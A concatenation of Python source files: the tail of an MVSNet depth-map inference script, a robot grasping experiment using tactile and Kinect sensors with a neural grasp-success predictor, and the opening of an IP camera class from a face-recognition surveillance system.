int(os.path.splitext(os.path.basename(data[1]))[0]) selected_view_num = int(len(data) // 2) if self.mode == 'bf': selected_view_num -= 1 view_comb = data[0] for view in range(min(self.view_num, selected_view_num)): image_file = file_io.FileIO(data[2 * view + 1], mode='r') image = scipy.misc.imread(image_file, mode='RGB') image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) cam_file = file_io.FileIO(data[2 * view + 2], mode='r') cam = load_cam(cam_file, FLAGS.interval_scale) if cam[1][3][2] == 0: cam[1][3][2] = FLAGS.max_d images.append(image) cams.append(cam) if self.mode == 'bf': gt_depth = load_pfm(open(data[2 * selected_view_num + 1])) if selected_view_num < self.view_num: for view in range(selected_view_num, self.view_num): image_file = file_io.FileIO(data[1], mode='r') image = scipy.misc.imread(image_file, mode='RGB') image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) cam_file = file_io.FileIO(data[2], mode='r') cam = load_cam(cam_file, FLAGS.interval_scale) images.append(image) cams.append(cam) # print ('range: ', cams[0][1, 3, 0], cams[0][1, 3, 1], cams[0][1, 3, 2], cams[0][1, 3, 3]) # determine a proper scale to resize input resize_scale = 1 if FLAGS.adaptive_scaling: h_scale = 0 w_scale = 0 for view in range(self.view_num): height_scale = float(FLAGS.max_h) / images[view].shape[0] width_scale = float(FLAGS.max_w) / images[view].shape[1] if height_scale > h_scale: h_scale = height_scale if width_scale > w_scale: w_scale = width_scale if h_scale > 1 or w_scale > 1: 
print("max_h, max_w should < W and H!") exit(-1) resize_scale = h_scale if w_scale > h_scale: resize_scale = w_scale scaled_input_images, scaled_input_cams = scale_mvs_input(images, cams, scale=resize_scale) # crop to fit network croped_images, croped_cams = crop_mvs_input(scaled_input_images, scaled_input_cams) # center images centered_images = [] for view in range(self.view_num): centered_images.append(center_image(croped_images[view])) # sample cameras for building cost volume real_cams = np.copy(croped_cams) scaled_cams = scale_mvs_camera(croped_cams, scale=FLAGS.sample_scale) # return mvs input scaled_images = [] for view in range(self.view_num): scaled_images.append(scale_image(croped_images[view], scale=FLAGS.sample_scale)) scaled_images = np.stack(scaled_images, axis=0) croped_images = np.stack(croped_images, axis=0) scaled_cams = np.stack(scaled_cams, axis=0) self.counter += 1 retval = (scaled_images, centered_images, scaled_cams, image_index, view_comb) if self.mode == 'bf': retval += (gt_depth,) yield retval def mvsnet_pipeline(mvs_list, mode): print('sample number: ', len(mvs_list)) # create output folder output_folder = os.path.join(FLAGS.output_folder, 'depths_mvsnet') if not os.path.isdir(output_folder): os.makedirs(output_folder) # testing set mvs_generator = iter(MVSGenerator(mvs_list, FLAGS.view_num, mode)) generator_data_type = (tf.float32, tf.float32, tf.float32, tf.int32, tf.int32) if mode == 'bf': generator_data_type += (tf.float32,) mvs_set = tf.data.Dataset.from_generator(lambda: mvs_generator, generator_data_type) mvs_set = mvs_set.batch(FLAGS.batch_size) mvs_set = mvs_set.prefetch(buffer_size=1) # data from dataset via iterator mvs_iterator = mvs_set.make_initializable_iterator() if mode == 'bf': scaled_images, centered_images, scaled_cams, image_index, view_comb, gt_depth = mvs_iterator.get_next() else: scaled_images, centered_images, scaled_cams, image_index, view_comb = mvs_iterator.get_next() # set shapes scaled_images.set_shape(tf.TensorShape([None, FLAGS.view_num, None, None, 3])) centered_images.set_shape(tf.TensorShape([None, FLAGS.view_num, None, None, 3])) scaled_cams.set_shape(tf.TensorShape([None, FLAGS.view_num, 2, 4, 4])) depth_start = tf.reshape( tf.slice(scaled_cams, [0, 0, 1, 3, 0], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size]) depth_interval = tf.reshape( tf.slice(scaled_cams, [0, 0, 1, 3, 1], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size]) depth_num = tf.cast( tf.reshape(tf.slice(scaled_cams, [0, 0, 1, 3, 2], [1, 1, 1, 1, 1]), []), 'int32') # deal with inverse depth depth_end = tf.reshape( tf.slice(scaled_cams, [0, 0, 1, 3, 3], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size]) # depth map inference using 3DCNNs init_depth_map, prob_map = inference_mem( centered_images, scaled_cams, FLAGS.max_d, depth_start, depth_interval) # init option init_op = tf.global_variables_initializer() var_init_op = tf.local_variables_initializer() # GPU grows incrementally config = tf.ConfigProto() config.gpu_options.allow_growth = True with tf.Session(config=config) as sess: # initialization sess.run(var_init_op) sess.run(init_op) # load model if FLAGS.model_dir is not None: pretrained_model_ckpt_path = os.path.join(FLAGS.model_dir, 'model.ckpt') restorer = tf.train.Saver(tf.global_variables()) restorer.restore(sess, '-'.join([pretrained_model_ckpt_path, str(FLAGS.ckpt_step)])) print(Notify.INFO, 'Pre-trained model restored from %s' % ('-'.join([pretrained_model_ckpt_path, str(FLAGS.ckpt_step)])), Notify.ENDC) # run inference for each reference view 
sess.run(mvs_iterator.initializer) if mode == 'bf': last_img_id = None for step in range(len(mvs_list)): start_time = time.time() try: if mode == 'bf': out_init_depth_map, out_prob_map, out_images, out_cams, out_index, out_view_comb, out_gt_depth = sess.run([init_depth_map, prob_map, scaled_images, scaled_cams, image_index, view_comb, gt_depth]) else: out_init_depth_map, out_prob_map, out_images, out_cams, out_index, out_view_comb = sess.run([init_depth_map, prob_map, scaled_images, scaled_cams, image_index, view_comb]) except tf.errors.OutOfRangeError: print("all dense finished") # ==> "End of dataset" break duration = time.time() - start_time print(Notify.INFO, 'depth inference %d finished. (%.3f sec/step)' % (step, duration), Notify.ENDC) # squeeze output out_init_depth_image = np.squeeze(out_init_depth_map) out_prob_map = np.squeeze(out_prob_map) out_ref_image = np.squeeze(out_images) out_ref_image = np.squeeze(out_ref_image[0, :, :, :]) out_ref_cam = np.squeeze(out_cams) out_ref_cam = np.squeeze(out_ref_cam[0, :, :, :]) out_index = np.squeeze(out_index) out_view_comb = np.squeeze(out_view_comb) if mode == 'bf': out_gt_depth = np.squeeze(out_gt_depth) err = np.sqrt(np.mean((out_init_depth_image - out_gt_depth)[out_gt_depth > 0] ** 2)) if out_index == last_img_id and err >= min_err: continue min_err = err last_img_id = out_index print(Notify.INFO, 'Updated minimum RMSE for image %d: %.3f. Supporting views are %s' % (out_index, err, out_view_comb)) # paths init_depth_map_path = output_folder + ('/%08d_init.pfm' % out_index) prob_map_path = output_folder + ('/%08d_prob.pfm' % out_index) out_ref_image_path = output_folder + ('/%08d.jpg' % out_index) out_ref_cam_path = output_folder + ('/%08d.txt' % out_index) view_comb_path = output_folder + ('/%08d_view_comb.npy' % out_index) # save output write_pfm(init_depth_map_path, out_init_depth_image) write_pfm(prob_map_path, out_prob_map) out_ref_image = cv2.cvtColor(out_ref_image, cv2.COLOR_RGB2BGR) image_file = file_io.FileIO(out_ref_image_path, mode='w') scipy.misc.imsave(image_file, out_ref_image) write_cam(out_ref_cam_path, out_ref_cam) np.save(view_comb_path, out_view_comb) def get_subdirs(dir): "Get a list of immediate subdirectories" return next(os.walk(dir))[1] def main(_): # pylint: disable=unused-argument """ program entrance """ mode = 'bf' if mode == 'rnd': np.random.seed(100) # generate input path list scans = get_subdirs(FLAGS.dense_folder) base_output_folder = FLAGS.output_folder for scan in scans: print('scan : ', scan) mvs_list = gen_pipeline_mvs_list(os.path.join(FLAGS.dense_folder, scan), mode) FLAGS.output_folder = os.path.join(base_output_folder, scan) # mvsnet inference p = multiprocessing.Process(target=mvsnet_pipeline, args=(mvs_list, mode)) p.start() p.join() if __name__ == '__main__': tf.app.run()
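# The adaptive_scaling branch of MVSGenerator above shrinks every view by one
# common factor (the largest of max_h/H and max_w/W over all views) and then
# crops the result to fit the network. Below is a self-contained sketch of that
# resize-then-crop step for a single image, written here as a center crop; the
# helper name is hypothetical and this is illustration only. The real pipeline
# applies the equivalent transforms to the cameras as well (scale_mvs_input and
# crop_mvs_input also take and return the cams).
import cv2


def fit_to_network(image, max_h=512, max_w=640):
    h, w = image.shape[:2]
    scale = max(float(max_h) / h, float(max_w) / w)
    if scale > 1:
        raise ValueError("input image must be at least max_w x max_h")
    resized = cv2.resize(image, None, fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)
    rh, rw = resized.shape[:2]
    top, left = (rh - max_h) // 2, (rw - max_w) // 2
    return resized[top:top + max_h, left:left + max_w]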
randomized_search_2_recorded.py
#!/usr/bin/env python # Compatibility Python 2/3 from __future__ import division, print_function, absolute_import from builtins import range # ---------------------------------------------------------------------------------------------------------------------- import grip_and_record.inverse_kin from geometry_msgs.msg import ( PoseStamped, Pose, Point, Quaternion, ) from data_recorder import DataRecorder import data_recorder as dr from grip_and_record.robot_utils import Orientations import rospy import intera_interface from intera_interface import CHECK_VERSION from intera_interface import ( Gripper, Lights, Cuff, RobotParams, ) import numpy as np from transform import transform import time import grip_and_record.getch import grip_and_record.locate_cylinder import os import matplotlib.pyplot as plt from KinectA import KinectA from KinectB import KinectB import logging import threading from GelSightA import GelSightA from GelSightB import GelSightB import WSG50_manu import tensorflow_model_is_gripping.press as press import pylab import cv2 import time import random import multiprocessing import tensorflow_model_is_gripping.aolib.util as ut import tensorflow_model_is_gripping.grasp_net import tensorflow_model_is_gripping.grasp_params import tensorflow_model_is_gripping.aolib.img as ig import data_recorder as dr logger = logging.getLogger() logger.setLevel(logging.DEBUG) # To log file fh = logging.FileHandler('run_experiment.log') fh.setLevel(logging.DEBUG) logger.addHandler(fh) ############################### # Parameters experiment ############################### COMPUTE_BG = False # Store a new background image bounds_table = np.array([[0.45, 0.65], [-0.25, 0.25]]) # X(min, max), Y(min, max) # TODO: this is too small!!! grasping_force = [4, 25] # min, max of the force [N] applied by the gripper when trying to grasp the object xyz_bias = [+0.01, -0.02, 0] # bias to compensate for sawyer-kinect calibration inaccuracies # NAMEOBJECT = 'soft_blue_hexagon' # NAMEOBJECT = 'jasmine_tea' # NAMEOBJECT = '3d_printed_screw' # NAMEOBJECT = 'yellow_berkeley_mug' # NAMEOBJECT = 'wired_pen_container' # NAMEOBJECT = 'glass_container_spices' # NAMEOBJECT = 'staples_box' # NAMEOBJECT = 'logitech_mouse' # NAMEOBJECT = 'mini_vase' # NAMEOBJECT = 'coconut_te0a_box' # NAMEOBJECT = 'calcium_antacid' # NAMEOBJECT = "monster_truck" NAMEOBJECT = "ogx_shampoo" THRESHOLD_GRASPING = 0.9 # Choose modality for prediction images_only = False gel_and_images = not images_only ############################### # Parameters Gripper ############################### # Gelsight adaptor v1 # lower_bound_z = 0.21 # When using the v1 of the weiss_gelsight_adaptor (the short one, with large grasp) # height_gripper = 0.08 # v1 of the weiss_gelsight_adaptor # Gelsight adaptor v2 lower_bound_z = 0.245 # When using the v2 of the weiss_gelsight_adaptor (the tall one, with smaller grasp) height_gripper = 0.11 # v2 of the weiss_gelsight_adaptor ############################### def orientation_downward(angle): """ Return the quaternion for the gripper orientation :param angle: [rad] :return: """ angle = np.remainder(angle, np.pi) # Remap any angle to [0, +pi] orientation = Quaternion( x=1, y=angle, z=0, w=0, ) return orientation def sample_from_cylinder(xy, height_object=0.25, radius=0.1): """ Randomly sample a grasping position from a cylinder :param xy: x,y coordinates of the base/center of the cylinder :param height_object: height of the cylinder :param radius: radius of the cylinder :return: """ approach = 2 xy = np.array(xy) # TODO: 
assert things are the right dimension if approach == 1: # Approach 1: sample two points from the circumference, and the grasp is the line connecting them angles = np.random.uniform(0, 2 * np.pi, 2) # sample 2 points in terms of angles [rad] xy_points = xy + [radius * np.sin(angles), radius * np.cos(angles)] # convert them to xy position # compute line between points and corresponding EE position des_xy = np.sum(xy_points, 0) / 2 # Middle point angle_gripper = np.pi / 2 + (np.pi - (angles[1] - angles[0]) / 2) + angles[ 0] # TODO: compute angle gripper y = ax + b # rp.log_message('Moving to x=%f y=%f z=%f' % (des_xy[0], des[1], xyz[2])) angle_gripper = 0 orientation = orientation_downward(angle=angle_gripper) xyz = np.array([des_xy[0], des_xy[1], 0.25]) # fix height if approach == 2: # Approach 2: directly sample angle and shift xy_noise = 0.001 shift = np.random.uniform(low=-xy_noise, high=xy_noise, size=3) shift_z_min = np.maximum(0.01, height_object - height_gripper) # make sure that we don't hit with the gripper shift_z_max = height_object - 0.015 # small bias to avoid grasping air shift[2] = np.random.uniform(low=shift_z_min, high=shift_z_max) shift[2] = np.maximum(0, shift[2]) # Just for safety print('Z = [%f,%f] => %f' % (shift_z_min, shift_z_max, shift[2])) xyz = np.array([xy[0], xy[1], lower_bound_z]) + shift + xyz_bias orientation = orientation_downward(angle=np.random.uniform(0, np.pi)) return xyz, orientation def wait_for_key(): rp = intera_interface.RobotParams() # For logging rp.log_message("Press ESC to continue...") done = False while not done and not rospy.is_shutdown(): c = grip_and_record.getch.getch() if c: if c in ['\x1b', '\x03']: done = True ############################### class grasper(): def __init__(self, nameObject=''): self.rp = intera_interface.RobotParams() # For logging self.rp.log_message('') print('Make sure the correct object is printed below.') print('Object: %s' % nameObject) self.nameObject = nameObject # Make required initiations self.limb_name = "right" self.limb = None self.init_robot() self.gripper = self.init_gripper() # Requesting to start topics for KinectA self.rp.log_message('Launch topics for KinectA') self.rp.log_message('Please run the following command in a new terminal (in intera mode):') self.rp.log_message('rosrun kinect2_bridge kinect2_bridge') self.rp.log_message('') # Requesting to start topics for KinectB self.rp.log_message('Launch topics for KinectB') self.rp.log_message( 'Please run the following command in a new terminal (in intera mode) on the kinectbox02 (ssh):') # rp.log_message('ssh k2') # rp.log_message('for pid in $(ps -ef | grep "kinect2_bridge" | awk "{print $2}"); do kill -9 $pid; done') self.rp.log_message('/home/rail/ros_ws/src/manu_kinect/start_KinectB.sh') self.rp.log_message('') # Start Topic for the Gelsight self.rp.log_message('Launch topic for GelsightA') self.rp.log_message('Please run the following command in a new terminal (in intera mode):') self.rp.log_message('roslaunch manu_sawyer gelsightA_driver.launch') self.rp.log_message('') self.rp.log_message('Launch topic for GelsightB') self.rp.log_message('Please run the following command in a new terminal (in intera mode):') self.rp.log_message('roslaunch manu_sawyer gelsightB_driver.launch') self.gelSightA = GelSightA() self.gelSightB = GelSightB() self.kinectA = KinectA(save_init=COMPUTE_BG) self.kinectB = KinectB() time.sleep(1) # Requests the user to place the object to be griped on the table. 
self.rp.log_message('Place the object to grasp on the table.') wait_for_key() self.start_experiment() # Start grasping the object def init_robot(self): epilog = """ See help inside the example with the '?' key for key bindings. """ valid_limbs = self.rp.get_limb_names() if not valid_limbs: self.rp.log_message(("Cannot detect any limb parameters on this robot. " "Exiting."), "ERROR") return self.rp.log_message('Initializing node... ') rospy.init_node("move_and_grip") self.rp.log_message('Getting robot state... ') self.rs = intera_interface.RobotEnable(CHECK_VERSION) init_state = self.rs.state().enabled def clean_shutdown(): print("\nExiting example.") if not init_state: self.rp.log_message('Disabling robot...') self.rs.disable() rospy.on_shutdown(clean_shutdown) rospy.loginfo("Enabling robot...") self.rs.enable() if not self.limb_name in valid_limbs: self.rp.log_message(("Right is not a valid limb on this robot. " "Exiting."), "ERROR") return limb = intera_interface.Limb(self.limb_name) limb.set_joint_position_speed(0.15) self.limb = limb # Move to a safe position self.goto_rest_pos() def init_gripper(self): # Requesting to start topics for gripper self.rp.log_message('Launch topics for gripper') self.rp.log_message('Please run the following command in a new terminal:') self.rp.log_message('roslaunch wsg_50_driver wsg_50_tcp_script.launch') return WSG50_manu.WSG50() def goto_randomized_grasping_location(self): # Randomize grasping location # move arm there: self.goto_EE_xyz() pass def orientation_downward(self, angle): """ Return the quaternion for the gripper orientation :param angle: [rad] :return: """ angle = np.remainder(angle, np.pi) # Remap any angle to [0, +pi] orientation = Quaternion( x=1, y=angle, z=0, w=0, ) return orientation def goto_rest_pos(self, verbosity=1): """ Move the arm to a safe rest position :param limb: link to the limb being used :param blocking: Bool. is it a blocking operation? (ie., do we wait until the end of the operation?) :param verbosity: verbosity level. >0 print stuff :return: """ xyz_rest = [0.50, 0.50, 0.60] if verbosity > 0: self.rp.log_message('Moving to rest position') self.goto_EE_xyz(xyz=xyz_rest, orientation=Orientations.DOWNWARD_ROTATED, verbosity=verbosity - 1, rest_pos=True) def goto_EE_xyz(self, xyz, orientation=Orientations.DOWNWARD_ROTATED, verbosity=1, rest_pos=False): """ Move the End-effector to the desired XYZ position and orientation, using inverse kinematic :param limb: link to the limb being used :param xyz: list or array [x,y,z] with the coordinates in XYZ positions in limb reference frame :param orientation: :param verbosity: verbosity level. 
>0 print stuff :return: """ try: if verbosity > 0: self.rp.log_message('Moving to x=%f y=%f z=%f' % (xyz[0], xyz[1], xyz[2])) if not rest_pos: # Make sure that the XYZ position is valid, and doesn't collide with the cage assert (xyz[0] >= bounds_table[0, 0]) and (xyz[0] <= bounds_table[0, 1]), 'X is outside of the bounds' assert (xyz[1] >= bounds_table[1, 0]) and (xyz[1] <= bounds_table[1, 1]), 'Y is outside of the bounds' assert (xyz[2] >= lower_bound_z), 'Z is outside of the bounds' des_pose = grip_and_record.inverse_kin.get_pose(xyz[0], xyz[1], xyz[2], orientation) curr_pos = self.limb.joint_angles() # Measure current position joint_positions = grip_and_record.inverse_kin.get_joint_angles(des_pose, self.limb.name, curr_pos, use_advanced_options=True) # gets joint positions self.limb.move_to_joint_positions(joint_positions) # Send the command to the arm except UnboundLocalError: pose_dict = self.limb.endpoint_pose() pose_pos = pose_dict['position'] current_xyz = [pose_pos.x, pose_pos.y, pose_pos.z] halfway_xyz = ((np.array(xyz) + np.array(current_xyz)) / 2.0).tolist() if np.linalg.norm(np.array(current_xyz) - np.array(halfway_xyz)) > 0.00001: time.sleep(0.2) if rest_pos: self.goto_EE_xyz(halfway_xyz, orientation, rest_pos=True) self.goto_EE_xyz(xyz, orientation, rest_pos=True) else: self.goto_EE_xyz(halfway_xyz, orientation) self.goto_EE_xyz(xyz, orientation) else: print("WoooOooOW") self.goto_EE_xyz([0.60, 0.0, 0.40], orientation, rest_pos=True) def predict_grasping_success(self, gel0_pre, gel1_pre, gel0_post, gel1_post, im0_pre, im0_post, depth0_pre, depth0_post): if images_only: net_pr = tensorflow_model_is_gripping.grasp_params.im_fulldata_v5() checkpoint_file = '/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-6499' elif gel_and_images: net_pr = tensorflow_model_is_gripping.grasp_params.gel_im_fulldata_v5() checkpoint_file = '/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/full/net.tf-6499' gpu = '/gpu:0' # sc = lambda x: ig.scale(x, (224, 224)) def sc(x): """ do a center crop (helps with gelsight) """ x = ig.scale(x, (256, 256)) return ut.crop_center(x, 224) crop = tensorflow_model_is_gripping.grasp_net.crop_kinect inputs = dict( gel0_pre=sc(gel0_pre), gel1_pre=sc(gel1_pre), gel0_post=sc(gel0_post), gel1_post=sc(gel1_post), im0_pre=sc(crop(im0_pre)), im0_post=sc(crop(im0_post)), depth0_pre=sc(crop(depth0_pre.astype('float32'))), depth0_post=sc(crop(depth0_post.astype('float32')))) net = tensorflow_model_is_gripping.grasp_net.NetClf(net_pr, checkpoint_file, gpu) prob = net.predict(**inputs) print("Probability: ", prob[1]) return prob[1] def obj_func(self, x): """ This is the function that evaluate the objective function, ie, the goodness of the grasping :param x: np.array of parameters to evaluate [EE_x,EE_y,EE_z,orientation,graspingforce] :return: """ # Unpack parameters des_xyz = x[0:3] des_EE_xyz_above = des_xyz + np.array([0, 0, 0.2]) des_orientation = self.orientation_downward(x[3]) des_grasping_force = x[4] # Goto desired grasp position above # self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) # Get image from GelSight # GelSightA gelA_img_r_ini = self.gelSightA.get_image() gelA_img_r_ini = cv2.cvtColor(gelA_img_r_ini, cv2.COLOR_BGR2RGB) # GelSightB gelB_img_r_ini = self.gelSightB.get_image() gelB_img_r_ini = cv2.cvtColor(gelB_img_r_ini, cv2.COLOR_BGR2RGB) gel0_pre = gelA_img_r_ini gel1_pre = gelB_img_r_ini im0_pre = cv2.cvtColor(self.kinectA.get_color_image(), 
cv2.COLOR_BGR2RGB) depth0_pre = self.kinectA.get_depth_image() # Goto desired grasp position self.goto_EE_xyz(xyz=des_xyz, orientation=des_orientation) self.limb.set_joint_position_speed(0.12) # Attempt grasp self.grasp_object(force=des_grasping_force) time.sleep(2) gelA_img_r = self.gelSightA.get_image() gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB) gelB_img_r = self.gelSightB.get_image() gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB) gel0_post = gelA_img_r gel1_post = gelB_img_r im0_post = cv2.cvtColor(self.kinectA.get_color_image(), cv2.COLOR_BGR2RGB) depth0_post = self.kinectA.get_depth_image() # Predict goodness grasp out = self.predict_grasping_success(gel0_pre, gel1_pre, gel0_post, gel1_post, im0_pre, im0_post, depth0_pre, depth0_post) return out def reset_gripper(self, x): # des_xyz = x[0:3] # des_EE_xyz_above = des_xyz + np.array([0, 0, 0.2]) # des_orientation = self.orientation_downward(x[3]) self.gripper.open(speed=80) # Open gripper time.sleep(0.5) # self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) def attempt_lift_(self, x): des_xyz = x[0:3] des_EE_xyz_above = des_xyz + np.array([0, 0, 0.2]) des_orientation = self.orientation_downward(x[3]) self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) time.sleep(4) self.goto_EE_xyz(xyz=des_xyz + np.array([0, 0, 0.02]), orientation=des_orientation) self.gripper.open(speed=100) time.sleep(0.5) self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) def grasp_object(self, force): """ Close the gripper to grasp an object, up to the desired gasping force. :param gripper: :return: """ print("Setting gripping force:", force) self.gripper.set_force(force) self.gripper.graspmove_nopending(width=5, speed=80) time.sleep(2) gripper_force = self.gripper.get_force() print("Getting gripping force:", gripper_force) def start_experiment(self): fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2) # Fit a cylinder around the object with the Kinect and get location, etc. 
self.rp.log_message('Waiting for Kinect to stabilize') time.sleep(1) self.rp.log_message('Done') xyz_kinect, height_object, radius, obj_vis = self.kinectA.calc_object_loc() # Gettig image from KinectB top_img = self.kinectB.get_color_image() top_img = cv2.cvtColor(top_img, cv2.COLOR_BGR2RGB) # Get image from GelSight # GelSightA gelA_img_r_ini = self.gelSightA.get_image() gelA_img_r_ini = cv2.cvtColor(gelA_img_r_ini, cv2.COLOR_BGR2RGB) # GelSightB gelB_img_r_ini = self.gelSightB.get_image() gelB_img_r_ini = cv2.cvtColor(gelB_img_r_ini, cv2.COLOR_BGR2RGB) # Plot result from Kinect for visualisation of fitted cylinder # Plot pic from GelSight kinA_img = ax1.imshow(obj_vis) kinB_img = ax2.imshow(top_img) gelA_img = ax3.imshow(gelA_img_r_ini) gelB_img = ax4.imshow(gelB_img_r_ini) ax1.axis('off') ax2.axis('off') ax3.axis('off') ax4.axis('off') plt.draw() plt.ion() plt.show() # ---------------------------------------------------------------------------------- # Transform from Kinect coordinates to Sawyer coordinates xyz_sawyer = transform(xyz_kinect[0], xyz_kinect[1], xyz_kinect[2]).reshape(3) # Sample randomized gripper position based on the fitted cylinder data des_EE_xyz, des_orientation_EE = sample_from_cylinder(xyz_sawyer[0:2], height_object, radius) data_recorder = DataRecorder(limb=self.limb, gripper=self.gripper, GelSightA=self.gelSightA, GelSightB=self.gelSightB, KinectA=self.kinectA, KinectB=self.kinectB) # Initialize recording to file nameFile = time.strftime("%Y-%m-%d_%H%M%S") + "_randomized_search_2" frequency = 30 thread = threading.Thread(target=data_recorder.init_record, args=(nameFile, frequency)) thread.start() time.sleep(0.2) from multiprocessing.pool import ThreadPool pool = multiprocessing.pool.ThreadPool(processes=1) des_EE_xyz_above = des_EE_xyz + np.array([0, 0, 0.2]) self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation_EE) self.limb.set_joint_position_speed(0.08) force = np.random.uniform(grasping_force[0], grasping_force[1]) x = [des_EE_xyz[0], des_EE_xyz[1], des_EE_xyz[2], des_orientation_EE.y, force] # Initial guess by the Kinect # =========================================================================================================== path = "/home/manu/ros_ws/src/manu_research/data/" file = open(path + nameFile + '.txt', 'w') file.write("Object name: " + NAMEOBJECT + "\n") file.write("Image_and_Gel: " + str(gel_and_images) + "\n") file.write("Image_only: " + str(images_only) + "\n") # # Randomize grasping location # Start optimization grasp # promising_attempt = False while True: # Predict grasping success grasping_success = self.obj_func(x) file.write(str(x) + " " + str(grasping_success) + "\n") # Decide what to do if grasping_success > THRESHOLD_GRASPING: self.attempt_lift_(x) break else: self.reset_gripper(x) noise = 0.003 delta_xyz = np.random.uniform(low=-noise, high=noise, size=3) delta_z_min = np.maximum(0.01, height_object - height_gripper) delta_z_max = height_object - 0.015 delta_xyz[2] = np.random.uniform(low=delta_z_min, high=delta_z_max) delta_xyz[2] = np.maximum(0, delta_xyz[2]) # Just for safety des_EE_xyz = np.array([des_EE_xyz[0], des_EE_xyz[1], lower_bound_z]) + delta_xyz angle = np.random.uniform(0, np.pi) force = np.random.uniform(grasping_force[0], grasping_force[1]) x = [des_EE_xyz[0], des_EE_xyz[1], des_EE_xyz[2], angle, force] # =========================================================================================================== # Stop recording data for this iteration data_recorder.stop_record() thread.join() comp_task 
= dr.CompressionTask(data_recorder, pool) comp_task.run_sync() # data_recorder.end_processes() print("Was it a successful grasp? [y/n]") done = False while not done: c = grip_and_record.getch.getch() if c: if c in ['n']: successful = False done = True elif c in ['y']: successful = True done = True file.write("Successful attempt: " + str(successful)) file.close() rospy.signal_shutdown("Example finished.") if __name__ == '__main__': grasper(nameObject=NAMEOBJECT)
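# The experiment script above hands data recording to a worker thread
# (threading.Thread(target=data_recorder.init_record, ...)) and later calls
# data_recorder.stop_record() followed by thread.join(). Below is a minimal,
# self-contained sketch of that start/stop/join pattern; LoopRecorder is a
# hypothetical stand-in for DataRecorder, using a threading.Event as the stop flag.
import threading
import time


class LoopRecorder(object):
    def __init__(self):
        self._stop = threading.Event()
        self.samples = []

    def init_record(self, name, frequency):
        period = 1.0 / frequency
        while not self._stop.is_set():
            # placeholder for the real sensor/camera reads done by DataRecorder
            self.samples.append((name, time.time()))
            time.sleep(period)

    def stop_record(self):
        self._stop.set()


recorder = LoopRecorder()
worker = threading.Thread(target=recorder.init_record, args=("demo", 30))
worker.start()
time.sleep(1)            # stand-in for the grasp attempt itself
recorder.stop_record()   # ask the recording loop to exit
worker.join()            # wait for the thread to finish before touching the data
print("%d samples recorded" % len(recorder.samples))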
Camera.py
# Camera Class # Brandon Joffe # 2016 # # Copyright 2016, Brandon Joffe, All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import threading import time import numpy as np import cv2 import cv2.cv as cv import ImageUtils import dlib import openface import os import argparse import logging import SurveillanceSystem import MotionDetector import FaceDetector import pdb #logging.basicConfig(level=logging.DEBUG, # format='(%(threadName)-10s) %(message)s', # ) logger = logging.getLogger(__name__) fileDir = os.path.dirname(os.path.realpath(__file__)) modelDir = os.path.join(fileDir, '..', 'models') dlibModelDir = os.path.join(modelDir, 'dlib') openfaceModelDir = os.path.join(modelDir, 'openface') parser = argparse.ArgumentParser() parser.add_argument('--networkModel', type=str, help="Path to Torch network model.", default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7')) parser.add_argument('--imgDim', type=int, help="Default image dimension.", default=96) parser.add_argument('--cuda', action='store_true') args = parser.parse_args() CAPTURE_HZ = 30.0 # Determines frame rate at which frames are captured from IP camera class IPCamera(object): """The IPCamera object continually captures frames from a camera and makes these frames available for proccessing and streamimg to the web client. A IPCamera can be processed using 5 different processing functions detect_motion, detect_recognise, motion_detect_recognise, segment_detect_recognise, detect_recognise_track. 
These can be found in the SureveillanceSystem object, within the process_frame function""" def __init__(self,camURL, cameraFunction, dlibDetection, fpsTweak): logger.info("Loading Stream From IP Camera: " + camURL) self.motionDetector = MotionDetector.MotionDetector() self.faceDetector = FaceDetector.FaceDetector() self.processing_frame = None self.tempFrame = None self.captureFrame = None self.streamingFPS = 0 # Streaming frame rate per second self.processingFPS = 0 self.FPSstart = time.time() self.FPScount = 0 self.motion = False # Used for alerts and transistion between system states i.e from motion detection to face detection self.people = {} # Holds person ID and corresponding person object self.trackers = [] # Holds all alive trackers self.cameraFunction = cameraFunction self.dlibDetection = dlibDetection # Used to choose detection method for camera (dlib - True vs opencv - False) self.fpsTweak = fpsTweak # used to know if we should apply the FPS work around when you have many cameras self.rgbFrame = None self.faceBoxes = None self.captureEvent = threading.Event() self.captureEvent.set() self.peopleDictLock = threading.Lock() # Used to block concurrent access to people dictionary # pdb.set_trace() self.video = cv2.VideoCapture(camURL) # VideoCapture object used to capture frames from IP camera logger.info("We are opening the video feed.") self.url = camURL if not self.video.isOpened(): self.video.open() logger.info("Video feed open.") print("Video feed open.") self.dump_video_info() # logging every specs of the video feed # Start a thread to continuously capture frames. # The capture thread ensures the frames being processed are up to date and are not old self.captureLock = threading.Lock() # Sometimes used to prevent concurrent access self.captureThread = threading.Thread(name='video_captureThread',target=self.get_frame) self.captureThread.daemon = True self.captureThread.start() self.captureThread.stop = False # pdb.set_trace() print("We in IP Camera, end of init") def __del__(self): self.video.release() def get_frame(self): logger.debug('Getting Frames') FPScount = 0 warmup = 0 #fpsTweak = 0 # set that to 1 if you want to enable Brandon's fps tweak. that break most video feeds so recommend not to FPSstart = time.time() while True: success, frame = self.video.read() self.captureEvent.clear() if success: self.captureFrame = frame self.captureEvent.set() FPScount += 1 if FPScount == 5: self.streamingFPS = 5/(time.time() - FPSstart) 